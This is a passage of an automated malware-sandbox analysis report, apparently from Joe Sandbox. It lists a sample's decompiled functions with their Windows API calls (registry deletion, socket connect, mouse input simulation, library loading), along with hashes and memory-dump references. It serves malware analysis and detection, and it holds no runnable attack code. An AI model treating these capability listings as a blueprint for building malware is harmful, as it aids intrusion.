Instruction Fuzzy Hash: 4B416874A05609EFDB22DF54E884EAABBF8FF09351F058429ED1597260D730AD18CFA0

Function 0035122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0035125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00351286
FreeLibrary.KERNEL32(00000000), ref: 0035133D

Part of subcall function 0035122D: RegCloseKey.ADVAPI32(?), ref: 003512A3
Part of subcall function 0035122D: FreeLibrary.KERNEL32(?), ref: 003512F5
Part of subcall function 0035122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00351318

RegDeleteKeyW.ADVAPI32(?,?), ref: 003512E0

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 81beab84fae8fc7e11959b2718562a0fca6ad10845f306d46be3b5b963dfddce
Instruction ID: 9c23b9e1accf7c9cd55c0d62fdc1e42b2c9554a0e482d79b7fa763701795ef66
Opcode Fuzzy Hash: 81beab84fae8fc7e11959b2718562a0fca6ad10845f306d46be3b5b963dfddce
Instruction Fuzzy Hash: A0312D75901209BFDB169B90DC99EFFB7BCEF08311F000569E911E3161DB749E499AA0

Function 0035653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0035655B
GetWindowLongW.USER32(019457D8,000000F0), ref: 0035658E
GetWindowLongW.USER32(019457D8,000000F0), ref: 003565C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003565F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0035661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00356630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0035664A

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 768ff2e07e1596c5259fd652126ddacc35a5ba2edaf7230d1c221a0f1dd86e0a
Instruction ID: 3ba8598f295ebf88b0481cfca227f52d467b482d89f56bc01f3ad2c4d108ae59
Opcode Fuzzy Hash: 768ff2e07e1596c5259fd652126ddacc35a5ba2edaf7230d1c221a0f1dd86e0a
Instruction Fuzzy Hash: 13312830645250AFDB22CF18DC86F5537E9FB4A352F9A0169F9028B2B6DB72AC44DB41

Function 00346486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 003480A0: inet_addr.WS2_32(00000000), ref: 003480CB

socket.WS2_32(00000002,00000001,00000006), ref: 003464D9
WSAGetLastError.WS2_32(00000000), ref: 003464E8
ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00346521
connect.WSOCK32(00000000,?,00000010), ref: 0034652A
WSAGetLastError.WS2_32 ref: 00346534
closesocket.WS2_32(00000000), ref: 0034655D
ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00346576

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 5a1e9f0676b577295ef47713db46139f91c14aa89e515f0341ba6ef07abbd77e
Instruction ID: f366389f7638f7a12da50a24d9457dccfb5c2f84126914609ff36c7cce7da069
Opcode Fuzzy Hash: 5a1e9f0676b577295ef47713db46139f91c14aa89e515f0341ba6ef07abbd77e
Instruction Fuzzy Hash: 9931A171600218AFDF11AF24CC86BBE7BECEB46711F018069F9099B391DB74AD44CB62

Function 0035783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002D1D73
Part of subcall function 002D1D35: GetStockObject.GDI32(00000011), ref: 002D1D87
Part of subcall function 002D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 002D1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003578A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003578AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003578B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003578C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003578D4

Strings

Msctls_Progress32, xrefs: 00357872

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 8d65e9cef011b7bc2fe606b99b4ee5adf23f9448c814f76482367abaff395da8
Instruction ID: 17365a8643330c769c9c3fe931b46c0e211fa5d30be2084ac722dfcaf65f7f82
Opcode Fuzzy Hash: 8d65e9cef011b7bc2fe606b99b4ee5adf23f9448c814f76482367abaff395da8
Instruction Fuzzy Hash: BE1198B155021ABFEF159F60CC86EE77F5DEF08758F014115FA04A60A0C7729C21DBA4

Function 002F41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 002F41E3
GetProcAddress.KERNEL32(00000000), ref: 002F41EA
RtlEncodePointer.NTDLL(00000000), ref: 002F41F6
RtlDecodePointer.NTDLL(00000001), ref: 002F4213

Strings

RoInitialize, xrefs: 002F41D2
combase.dll, xrefs: 002F41DE

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 8ce22e8d4f44ba98a4d7060725b16c539c3dff2af40afb06c997d3f0c6d1a695
Instruction ID: 95fc6c05d1cbe0227e9f488950f669c386eac97f7380d3c4234a8e6ebd3a7ec0
Opcode Fuzzy Hash: 8ce22e8d4f44ba98a4d7060725b16c539c3dff2af40afb06c997d3f0c6d1a695
Instruction Fuzzy Hash: 70E01AB5690701AEEB226FB0EC09F563AACB720B43F108835F922D50F4DBB640928F00

Function 002F429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002F41B8), ref: 002F42B8
GetProcAddress.KERNEL32(00000000), ref: 002F42BF
RtlEncodePointer.NTDLL(00000000), ref: 002F42CA
RtlDecodePointer.NTDLL(002F41B8), ref: 002F42E5

Strings

RoUninitialize, xrefs: 002F42A7
combase.dll, xrefs: 002F42B3

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 2deb56a51437c9efd2f6c5c536e2a5284792f6b8c83b25acd5986bb3849137f3
Instruction ID: cd690f2556bc7d7622ead0d62b3d87c32063234bc95d7d51ac91982dc0af6c7b
Opcode Fuzzy Hash: 2deb56a51437c9efd2f6c5c536e2a5284792f6b8c83b25acd5986bb3849137f3
Instruction Fuzzy Hash: 71E0B67C591701AFEB12AF60EC0DF563AACB724787F104436F515E20B4CBB64551CA18

Function 00346E8A Relevance: 9.2, APIs: 6, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5d11213ccd5edf612e45896e4442390f08da4930435340c3564a9e692025b0
Instruction ID: 7832f2fce3510a7570849ae58254072757bbd8889a89253d4dc9dd8b92eb83ef
Opcode Fuzzy Hash: 7a5d11213ccd5edf612e45896e4442390f08da4930435340c3564a9e692025b0
Instruction Fuzzy Hash: CD61BC71118310AFC711EF24CC86F6FB7E9AF88714F50491AF5459B2A2DB70AD44CB92

Function 0033675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003368AD
_memmove.LIBCMT ref: 003367E8

Part of subcall function 002D9997: __itow.LIBCMT ref: 002D99C2
Part of subcall function 002D9997: __swprintf.LIBCMT ref: 002D9A0C

_memmove.LIBCMT ref: 0033685B
_memmove.LIBCMT ref: 00336942
_memmove.LIBCMT ref: 0033695B
_memmove.LIBCMT ref: 00336977

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: f82c7607f84119ebeff09b9fd78fc0a0d3acecb0e74c04f4cb440ecf28d944ca
Instruction ID: 26b029087aeedd04fe671942f0d8ad1f4a8bd8afb4186ffc9675f8e5f946d640
Opcode Fuzzy Hash: f82c7607f84119ebeff09b9fd78fc0a0d3acecb0e74c04f4cb440ecf28d944ca
Instruction Fuzzy Hash: A2619C3051065AAFDF12EF20C892EFE77A8AF44308F45851AF9555B292DB349D61CF50

Function 0035046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 002D7F41: _memmove.LIBCMT ref: 002D7F82

Part of subcall function 003510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00350038,?,?), ref: 003510BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00350548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00350588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003505AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003505D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00350617
RegCloseKey.ADVAPI32(00000000), ref: 00350624

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: db41404a68c4cac36c34c69d1a92baba6dc7c999a7d84d4b008c6067480c4b46
Instruction ID: d1b21ec2d2be18524b078792e0255a0271fa05e881c1d890575d10c0a6e401c5
Opcode Fuzzy Hash: db41404a68c4cac36c34c69d1a92baba6dc7c999a7d84d4b008c6067480c4b46
Instruction Fuzzy Hash: 41513831118240AFD715EF64C885E6EBBE8FF89315F04492EF9458B2A1EB71E918CF52

Function 00355A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00355A82
GetMenuItemCount.USER32(00000000), ref: 00355AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00355AE1
GetMenuItemID.USER32(?,?), ref: 00355B50
GetSubMenu.USER32(?,?), ref: 00355B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00355BAF

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 5a32d96f94c4e610281012c65b9aeed2cd9a7889de841ee360e590219e7faf33
Instruction ID: 9d13671644e42b5e84fc9a337fb1d394474d371b1072a895c10e5818b8095da1
Opcode Fuzzy Hash: 5a32d96f94c4e610281012c65b9aeed2cd9a7889de841ee360e590219e7faf33
Instruction Fuzzy Hash: A1515C31A00625EFCB16AFA4C855EAEB7B4EF48311F114469FD01AB361CB70BE458F90

Function 0032F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0032F3F7
VariantClear.OLEAUT32(00000013), ref: 0032F469
VariantClear.OLEAUT32(00000000), ref: 0032F4C4
_memmove.LIBCMT ref: 0032F4EE
VariantClear.OLEAUT32(?), ref: 0032F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0032F569

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 4d8e263b67c2fb805091b8c004468787d451fe130cee19afc72878546af00b67
Instruction ID: eddc3332edc43975263a65f15006f760d702e8e8106547f95943a12bb79f69d4
Opcode Fuzzy Hash: 4d8e263b67c2fb805091b8c004468787d451fe130cee19afc72878546af00b67
Instruction Fuzzy Hash: 065157B5A00219EFCB11DF58D884AAAB7B8FF4C354B158169E959DB310D730E911CFA0

Function 003326F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00332747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00332792
IsMenu.USER32(00000000), ref: 003327B2
CreatePopupMenu.USER32 ref: 003327E6
GetMenuItemCount.USER32(000000FF), ref: 00332844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00332875

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 7144fe4db70500b0a8fef3ed75651a41c2fe039b9992bb06151580090396197c
Instruction ID: 09232a9a21aebe95d9805cd559c903386f6083f7cd440c0e3022024157ba7f37
Opcode Fuzzy Hash: 7144fe4db70500b0a8fef3ed75651a41c2fe039b9992bb06151580090396197c
Instruction Fuzzy Hash: 2F518A70A0030AEFDF26CF68D8C8AAFBBF9AF45314F114669E8119F291E7709945CB51

Function 002D1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 002D179A
GetWindowRect.USER32(?,?), ref: 002D17FE
ScreenToClient.USER32(?,?), ref: 002D181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002D182C
EndPaint.USER32(?,?), ref: 002D1876

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 1b5cd65d317b7447f5fa972173c593105bded3d41783e6fbe1f57381e70b0353
Instruction ID: 68ee8af7fdd0d1819a12b8244be9d1ddac8a18444e7c4a853026e7fc42886b3f
Opcode Fuzzy Hash: 1b5cd65d317b7447f5fa972173c593105bded3d41783e6fbe1f57381e70b0353
Instruction Fuzzy Hash: F741BC30215301AFE712DF24CC85BBA7BE8EB49724F04062AF994872B1C7319C65DB61

Function 0035B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(003967B0,00000000,019457D8,?,?,003967B0,?,0035B862,?,?), ref: 0035B9CC
EnableWindow.USER32(00000000,00000000), ref: 0035B9F0
ShowWindow.USER32(003967B0,00000000,019457D8,?,?,003967B0,?,0035B862,?,?), ref: 0035BA50
ShowWindow.USER32(00000000,00000004,?,0035B862,?,?), ref: 0035BA62
EnableWindow.USER32(00000000,00000001), ref: 0035BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0035BAA9

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 501984b3c880d52f4544fa1fb9f02e82e61114bcda52f889c546db243a502bd7
Instruction ID: 2ce8ba29d41761696bb435b0b8b2280215a70f4bfb590366e1e50f8b4c7ccaf3
Opcode Fuzzy Hash: 501984b3c880d52f4544fa1fb9f02e82e61114bcda52f889c546db243a502bd7
Instruction Fuzzy Hash: 65413034600241AFDB27DF14C489FA5BBE1BB05316F1942B9FE488F6B2C731A849CB51

Function 003473B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00345134,?,?,00000000,00000001), ref: 003473BF

Part of subcall function 00343C94: GetWindowRect.USER32(?,?), ref: 00343CA7

GetDesktopWindow.USER32 ref: 003473E9
GetWindowRect.USER32(00000000), ref: 003473F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00347422

Part of subcall function 003354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0033555E

GetCursorPos.USER32(?), ref: 0034744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003474AC

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

